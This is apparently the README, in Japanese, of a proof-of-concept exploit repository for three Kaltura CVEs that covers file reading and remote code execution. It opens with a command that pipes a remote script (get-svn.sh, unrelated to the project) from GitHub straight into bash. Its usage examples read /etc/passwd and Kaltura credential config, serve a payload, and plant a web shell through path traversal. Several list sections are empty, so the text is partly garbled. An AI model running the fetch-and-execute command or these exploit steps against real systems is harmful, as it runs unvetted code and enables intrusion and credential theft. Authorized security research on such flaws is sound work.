
CVE-2026-19912、CVE-2026-19913、CVE-2026-19914の概念実証エクスプロイト。Kalturaにおけるファイル読み取りとリモートコード実行を実証し、許可されたセキュリティテストと教育を目的としています。
外部ダウンロードスクリプトの最新版をGitHubから直接実行します:
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)
このコマンドにはBashと
curlが必要です。ソースを信頼できない場合は、実行前にリモートスクリプトを確認してください。
このプロジェクトは、安全で許可された環境でのみ使用してください。例:
セットアップ例:
git clone <repository-url>
cd <repository-name>
# プロジェクトは以下のようにPythonを使用します
# 仮想環境を作成
python -m venv venv
# 仮想環境を有効化
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# 依存関係をインストール
pip install -r requirements.txt
使用例:
# 1. ファイル読み取り(最も信頼性が高く、記事の説明どおりに動作します)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
-f /opt/kaltura/app/configurations/local.ini --try-versions
# 2. ペイロードサーバーのみ(Burp / curlと手動で併用)
python3 kaltura_poc.py serve --lport 8888
# 3. 完全なチェーンのスケルトン
python3 kaltura_poc.py rce http://127.0.0.1 \
--lhost 172.17.0.1 --lport 8888 \
--payload stdclass \
--shell '../../../../../../../../var/www/html/shell.php'
管理された環境でサイバーセキュリティの概念を学習、テスト、研究するためのリポジトリです。
このリポジトリは教育および許可されたセキュリティ研究のみを目的としています。
ユーザーが以下について学ぶことを目的として設計されています:
このリポジトリは、許可を得た環境でのみ使用してください。例:
許可のない、または違法な使用は固く禁止されています。
著者および貢献者は、このプロジェクトによって引き起こされた損害、誤用、法的問題、または損失について一切の責任を負いません。
このリポジトリを使用することにより、以下に同意したものとみなされます:
このプロジェクトは以下を目的としています:
責任ある開示の慣行に従い、適用されるすべての法律を遵守してください。
責任ある開示やコラボレーションについては、GitHubを通じてリポジトリのメンテナーにご連絡ください。
許可されたセキュリティ研究と教育を目的とした追加のCVE概念実証リソースについては、PoC CVEコレクションをご覧ください。